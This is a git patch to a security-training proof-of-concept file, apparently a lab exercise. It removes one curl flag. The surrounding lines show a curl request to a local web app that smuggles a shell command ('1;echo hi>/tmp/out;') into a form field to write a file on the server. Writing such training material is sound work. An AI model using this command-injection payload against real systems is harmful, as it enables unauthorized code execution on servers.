From 2d45436f90e2aa05ccffe13e975b9361e936a9ec Mon Sep 17 00:00:00 2001 From: Sander Hautvast Date: Tue, 6 Feb 2024 10:51:28 +0100 Subject: [PATCH] Update proof.md --- Sectraining/proof.md | 1 - 1 file changed, 1 deletion(-) diff --git a/Sectraining/proof.md b/Sectraining/proof.md index ba5cefb..0e0e79a 100644 --- a/Sectraining/proof.md +++ b/Sectraining/proof.md @@ -24,5 +24,4 @@ drop malicious payload in remote filesystem curl 'http://localhost:5000/home' \ -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQJEtZoqQ8I4ZmYVs' \ --data-raw $'------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs\r\nContent-Disposition: form-data; name="size"\r\n\r\n1;echo hi>/tmp/out;\r\n------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs--\r\n' \ - --compressed ```